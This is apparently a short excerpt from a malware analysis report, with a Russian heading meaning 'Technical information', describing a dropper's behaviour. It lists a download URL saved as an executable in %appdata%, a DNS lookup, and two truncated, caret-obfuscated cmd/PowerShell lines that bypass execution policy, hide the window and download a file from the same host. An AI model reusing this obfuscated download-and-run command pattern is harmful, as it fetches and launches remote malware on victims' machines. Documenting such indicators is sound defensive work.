Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOW^Er^shELl.^e^xE ^-e^X^EcUt^iOnP^OL^Ic^Y by^PaSs^ -^n^oPr^OfIle -^W^INdoWS^tY^l^E ^hIDdeN^ ^(^n^ew-^o^B^j^EcT ^s^ystE^m.n^ET.WEb^Cl^i^eN^t^).DOW^N^LO^A^dF^i^l^E('http://sut...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "pOW^Er^shELl.^e^xE ^-e^X^EcUt^iOnP^OL^Ic^Y by^PaSs^ -^n^oPr^OfIle -^W^INdoWS^tY^l^E ^hIDdeN^ ^(^n^ew-^o^B^j^EcT ^s^ystE^m.n^ET.WEb^Cl^i^eN^t^).DOW^N^LO^A^dF^i^l^E('http://sut...' (со скрытым окном)